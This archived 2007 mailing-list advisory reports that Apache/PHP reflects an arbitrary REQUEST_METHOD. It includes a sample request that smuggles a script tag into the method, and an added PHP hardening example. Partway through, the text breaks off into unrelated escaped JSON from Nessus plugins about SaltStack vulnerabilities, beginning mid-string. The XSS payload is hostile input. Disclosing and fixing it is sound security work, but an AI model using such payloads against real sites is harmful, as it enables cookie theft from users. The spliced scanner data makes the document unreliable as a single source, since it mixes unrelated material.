ID SECURITYVULNS:DOC:16846 Type securityvulns Reporter Securityvulns Modified 2007-04-25T00:00:00
Description
There is a flaw in the way the Apache and PHP combination handles the
$_SERVER array.
If the programmer writes a script like this:
<?php
echo $_SERVER['REQUEST_METHOD'];
?>
He will assume that REQUEST_METHOD can only be GET, POST, OPTIONS, TRACE
and the like. However, this is not true, since Apache accepts
requests that look like this:
GET<script>alert(document.coookie);</script> /test.php HTTP/1.0
And the output for this would be:
GET<script>alert(document.coookie);</script>
Of course it is hard to exploit (I think some Flash might help ;)) and
I don't know if it is exploitable at all. But programmers should be
warned about this behaviour. You can't trust any variable in the
$_SERVER table!
Regards Michal Majchrowicz.
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
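As an added example (not code from the original post), the vulnerable echo beside a hardened version: the method is checked against an allow-list of what the application actually serves, and any value reflected out of $_SERVER is HTML-escaped. The allow-list, the function names and the sample values are assumptions for this illustration.

```php
<?php
// Added example: REQUEST_METHOD as untrusted input. Apache passes the raw
// method token from the request line through to PHP unchanged, so the value
// can contain whatever the client sent, not only GET/POST/... .

// Vulnerable pattern from the post: reflects the raw method into HTML.
function render_method_unsafe(array $server): string
{
    return 'Method: ' . ($server['REQUEST_METHOD'] ?? '');
}

// Methods this hypothetical application handles (assumption for the example).
const ALLOWED_METHODS = ['GET', 'POST', 'HEAD', 'OPTIONS'];

/**
 * Return the request method only if it is one the application handles,
 * otherwise null. Strict comparison, no normalisation: "GET<script>..."
 * and "get" both fail.
 */
function validated_request_method(array $server): ?string
{
    $method = $server['REQUEST_METHOD'] ?? '';
    return in_array($method, ALLOWED_METHODS, true) ? $method : null;
}

/**
 * HTML-escape any $_SERVER entry before it is reflected. Applies equally to
 * REQUEST_URI, PHP_SELF, HTTP_* headers and the rest of the table, all of
 * which carry client-controlled bytes.
 */
function safe_server_value(array $server, string $key): string
{
    return htmlspecialchars($server[$key] ?? '', ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: reject unexpected methods, and still escape on output
// (defence in depth, in case the allow-list is loosened later).
function render_method_safe(array $server): string
{
    if (validated_request_method($server) === null) {
        http_response_code(405); // Method Not Allowed
        header('Allow: ' . implode(', ', ALLOWED_METHODS));
        return 'Unsupported request method';
    }
    return 'Method: ' . safe_server_value($server, 'REQUEST_METHOD');
}

// Constructed sample values standing in for what Apache would populate.
$samples = [
    ['REQUEST_METHOD' => 'POST'],
    ['REQUEST_METHOD' => 'GET<script>alert(1)</script>'],
    ['REQUEST_METHOD' => 'get'],
];
foreach ($samples as $server) {
    echo render_method_unsafe($server), ' | ', render_method_safe($server), PHP_EOL;
}
```

On the detection side, the method token is logged verbatim as part of the request line in Apache's access log, so malformed methods show up directly in routine log review.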
Title: [Full-disclosure] Apache/PHP REQUEST_METHOD XSS Vulnerability
Source: https://vulners.com/securityvulns/SECURITYVULNS:DOC:16846
Server Applications 15-SP2 :\n\nzypper in -t patch\nSUSE-SLE-Module-Server-Applications-15-SP2-2020-3155=1\n\nSUSE Linux Enterprise Module for Python2 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Python2-15-SP2-2020-3155=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2020-3155=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"python2-salt-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"python3-salt-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-api-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-cloud-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-doc-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-master-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-minion-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-proxy-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-ssh-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-standalone-formulas-configuration-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-syndic-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"python2-salt-3000-4.20.1\")) flag++;\nif 
(rpm_check(release:\"SLED15\", sp:\"2\", reference:\"python3-salt-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"salt-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"salt-doc-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"salt-minion-3000-4.20.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-10T09:37:11", "description": "Several vulnerabilities were discovered in salt.\n\nCVE-2020-16846\n\nAn unauthenticated user with network access to the Salt API can use\nshell injections to run code on the Salt-API using the SSH client\n\nCVE-2020-17490\n\nWhen using the functions create_ca, create_csr, and\ncreate_self_signed_cert in the tls execution module, it would not\nensure the key was created with the correct permissions.\n\nCVE-2020-25592\n\nProperly validate eauth credentials and tokens along with their Access\nControl Lists – ACLs. Prior to this change, eauth was not\nproperly validated when calling Salt SSH via the salt-api. Any value\nfor 'eauth' or 'token' would allow a user to\nbypass authentication and make calls to Salt SSH\n\nFor Debian 9 stretch, these problems have been fixed in version\n2016.11.2+ds-1+deb9u6.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/salt\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 2, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-07T00:00:00", "title": "Debian DLA-2480-1 : salt security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "modified": "2020-12-07T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:salt-syndic", "p-cpe:/a:debian:debian_linux:salt-proxy", "p-cpe:/a:debian:debian_linux:salt-master", "p-cpe:/a:debian:debian_linux:salt-common", "p-cpe:/a:debian:debian_linux:salt-cloud", "p-cpe:/a:debian:debian_linux:salt-ssh", "p-cpe:/a:debian:debian_linux:salt-api", "p-cpe:/a:debian:debian_linux:salt-minion", "p-cpe:/a:debian:debian_linux:salt-doc", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2480.NASL", "href": "https://www.tenable.com/plugins/nessus/143512", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2480-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143512);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/09\");\n\n script_cve_id(\"CVE-2020-16846\", \"CVE-2020-17490\", \"CVE-2020-25592\");\n\n script_name(english:\"Debian DLA-2480-1 : salt security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities were discovered in salt.\n\nCVE-2020-16846\n\nAn unauthenticated user with network access to the Salt API can use\nshell injections to run code on the Salt-API using the SSH client\n\nCVE-2020-17490\n\nWhen using the functions create_ca, create_csr, and\ncreate_self_signed_cert in the tls execution module, it would not\nensure the key was created with the correct permissions.\n\nCVE-2020-25592\n\nProperly validate eauth credentials and tokens along with their Access\nControl Lists – ACLs. Prior to this change, eauth was not\nproperly validated when calling Salt SSH via the salt-api. Any value\nfor 'eauth' or 'token' would allow a user to\nbypass authentication and make calls to Salt SSH\n\nFor Debian 9 stretch, these problems have been fixed in version\n2016.11.2+ds-1+deb9u6.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/salt\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/12/msg00007.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/salt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/salt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-proxy\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"salt-api\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-cloud\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-common\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-doc\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-master\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-minion\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-proxy\", 
reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-ssh\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-syndic\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-21T02:50:10", "description": "SaltStack reports multiple security vulnerabilities in Salt 3002 :\n\n- CVE-2020-16846: Prevent shell injections in netapi ssh client.\n\n- CVE-2020-17490: Prevent creating world readable private keys with\nthe tls execution module.\n\n- CVE-2020-25592: Properly validate eauth credentials and tokens along\nwith their ACLs. Prior to this change eauth was not properly validated\nwhen calling Salt ssh via the salt-api. Any value for 'eauth' or\n'token' would allow a user to bypass authentication and make calls to\nSalt ssh.", "edition": 3, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-12T00:00:00", "title": "FreeBSD : salt -- multiple vulnerabilities (50259d8b-243e-11eb-8bae-b42e99975750)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "modified": "2020-11-12T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:py38-salt", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:py36-salt", "p-cpe:/a:freebsd:freebsd:py37-salt"], "id": "FREEBSD_PKG_50259D8B243E11EB8BAEB42E99975750.NASL", "href": "https://www.tenable.com/plugins/nessus/142856", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms 
(SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(142856);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/20\");\n\n script_cve_id(\"CVE-2020-16846\", \"CVE-2020-17490\", \"CVE-2020-25592\");\n\n script_name(english:\"FreeBSD : salt -- multiple vulnerabilities (50259d8b-243e-11eb-8bae-b42e99975750)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote FreeBSD 
host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"SaltStack reports multiple security vulnerabilities in Salt 3002 :\n\n- CVE-2020-16846: Prevent shell injections in netapi ssh client.\n\n- CVE-2020-17490: Prevent creating world readable private keys with\nthe tls execution module.\n\n- CVE-2020-25592: Properly validate eauth credentials and tokens along\nwith their ACLs. Prior to this change eauth was not properly validated\nwhen calling Salt ssh via the salt-api. Any value for 'eauth' or\n'token' would allow a user to bypass authentication and make calls to\nSalt ssh.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://docs.saltstack.com/en/latest/topics/releases/3002.1.html\"\n );\n # https://vuxml.freebsd.org/freebsd/50259d8b-243e-11eb-8bae-b42e99975750.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?694fdb6a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25592\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py36-salt\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:freebsd:freebsd:py37-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py38-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"py36-salt>=3002<3002.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py37-salt>=3002<3002.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py38-salt>=3002<3002.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-21T03:19:01", "description": "The remote host is affected by the vulnerability described in GLSA-202011-13\n(Salt: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Salt. 
Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 3, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-12T00:00:00", "title": "GLSA-202011-13 : Salt: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "modified": "2020-11-12T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:salt", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202011-13.NASL", "href": "https://www.tenable.com/plugins/nessus/142850", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202011-13.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(142850);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/20\");\n\n script_cve_id(\"CVE-2020-16846\", \"CVE-2020-17490\", \"CVE-2020-25592\");\n script_xref(name:\"GLSA\", value:\"202011-13\");\n\n script_name(english:\"GLSA-202011-13 : Salt: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202011-13\n(Salt: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Salt. 
Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f2a5e02b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202011-13\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Salt users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-admin/salt-3000.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25592\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", 